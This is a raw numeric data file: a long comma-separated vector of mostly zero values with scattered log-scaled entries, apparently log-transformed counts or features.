0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.330733340286331, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 11.069054569245793, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 5.03709614637473, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.961361141082371, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6109179126442243, 0, 0.0, 0.0, 0.0, 3.931825632724326, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.189654742026425, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.718498871295094, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4825185607408002, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 